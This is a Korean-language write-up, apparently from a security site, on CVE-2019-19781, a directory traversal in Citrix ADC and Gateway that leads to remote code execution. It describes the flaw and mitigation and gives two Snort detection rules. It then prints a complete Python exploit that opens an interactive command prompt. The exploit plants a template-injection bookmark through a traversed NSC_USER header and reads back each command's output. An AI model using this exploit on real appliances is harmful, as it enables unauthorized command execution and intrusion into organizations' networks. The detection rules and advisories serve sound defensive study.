RCE, Citirx ADC and Gateway Directory Traversal본 글은 CVE-2019-19781에 등재된 Citrix ADC and Gateway Directory Traversal 원격코드 실행 RCE에 대한 글 입니다.
해당 원격코드 실행 취약점은 /vpn 경로 밑의 ../vpns에서 smb.conf 파일에 대한 검증이 적절하게 이루어지지 않아 발생한다.
시스템 구성정보나 서버 정보를 탈취
1. Citrix
- 1989년 설립된 미국의 다국적 소프트웨어 기업
- 서버, 애플리케이션 및 데스크톱 가상화, 네트워킹, SaaS, 클라우드 컴퓨팅 기술을 제공
- 취약한 Citrix 제품군에서 입력값 검증이 부족하여 발생하는 디렉터리 트래버설 취약점- 입력값에 대한 검증없이 요청 받은 경로를 직접 사용함으로써 발생하는 취약점
- 취약한 버전의 Citrix 제품군의 /vpns/ 경로에 인증 없이 디렉토리를 포함한 제한된 파일에 접근이 가능한 perl 스크립트가 존재
- 해당 perl 스크립트에서 요청 받은 경로를 직접 사용
## path delete
- /../이 포함된 요청과 /vpns/ 디렉터리에 접근하려는 요청을 차단
## POC CODE
```snort
alert tcp any any -> any $HTTP_PORTS (msg:"SERVER-WEBAPP Citrix ADC and Gateway arbitrary code execution attempt"; flow:to_server,established; content:"/vpns/"; fast_pattern:only; content:"/vpns/"; http_raw_uri; content:"/../"; http_raw_uri; reference:cve,2019-19781; reference:url,support.citrix.com/article/CTX267027;)
alert tcp any any -> any $HTTP_PORTS (msg:"SERVER-WEBAPP Citrix ADC and Gateway arbitrary code execution attempt"; flow:to_server,established; content:"/vpns/"; fast_pattern:only; content:"/vpns/"; http_raw_uri; content:"%2E%2E"; http_raw_uri; reference:cve,2019-19781; reference:url,support.citrix.com/article/CTX267027;)
```
```C
#!/usr/bin/env python
import requests
import string
import random
import re
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
print("CVE-2019-19781 - Remote Code Execution in Citrix Application Delivery Controller and Citrix Gateway")
print("Found by Mikhail Klyuchnikov")
print("")
if len(sys.argv) < 2:
print("[-] No URL provided")
sys.exit(0)
while True:
try:
command = input("command > ")
random_xml = ''.join(random.choices(string.ascii_uppercase + string.digits, k=12))
print("[+] Adding bookmark", random_xml + ".xml")
burp0_url = sys.argv[1] + "/vpn/../vpns/portal/scripts/newbm.pl"
burp0_headers = {"NSC_USER": "../../../../netscaler/portal/templates/" +
random_xml, "NSC_NONCE": "c", "Connection": "close"}
burp0_data = {"url": "http://exemple.com", "title": "[%t=template.new({'BLOCK'='print `" + str(command) + "`'})%][ % t % ]", "desc": "test", "UI_inuse": "RfWeb"}
r = requests.post(burp0_url, headers=burp0_headers, data=burp0_data,verify=False)
if r.status_code == 200:
print("[+] Bookmark added")
else:
print("\n[-] Target not vulnerable or something went wrong")
sys.exit(0)
burp0_url = sys.argv[1] + "/vpns/portal/" + random_xml + ".xml"
burp0_headers = {"NSC_USER": "../../../../netscaler/portal/templates/" +
random_xml, "NSC_NONCE": "c", "Connection": "close"}
r = requests.get(burp0_url, headers=burp0_headers,verify=False)
replaced = re.sub('^&#.* $', '', r.text, flags=re.MULTILINE)
print("[+] Result of the command: \n")
print(replaced)
except KeyboardInterrupt:
print("Exiting...")
break
```
## 참고
- https://nvd.nist.gov/vuln/detail/CVE-2019-19781
- https://github.com/mpgn/CVE-2019-19781
- https://github.com/jas502n/CVE-2019-19781
- https://www.cisa.gov/uscert/ncas/alerts/aa20-031a
- https://www.boho.or.kr/data/secNoticeView.do?bulletin_writing_sequence=35250&queryString=cGFnZT0xJnNvcnRfY29kZT0mc29ydF9jb2RlX25hbWU9JnNlYXJjaF9zb3J0PWRpc3BsYXlfY29udGVudHMmc2VhcmNoX3dvcmQ9Q1ZFLTIwMTktMTk3ODE=
- https://support.citrix.com/article/CTX267027/cve201919781-vulnerability-in-citrix-application-delivery-controller-citrix-gateway-and-citrix-sdwan-wanop-appliance
- https://support.citrix.com/article/CTX276688/citrix-application-delivery-controller-citrix-gateway-and-citrix-sdwan-wanop-appliance-security-update
- https://www.tripwire.com/state-of-security/citrix-netscaler-cve-2019-19781-what-you-need-to-know
- https://www.tenable.com/blog/cve-2019-19781-exploit-scripts-for-remote-code-execution-vulnerability-in-citrix-adc-and
- https://unit42.paloaltonetworks.com/exploits-in-the-wild-for-citrix-adc-and-citrix-gateway-directory-traversal-vulnerability-cve-2019-19781/
Log in to view the POC file snapshot cached by Shenlong Bot
Log in to view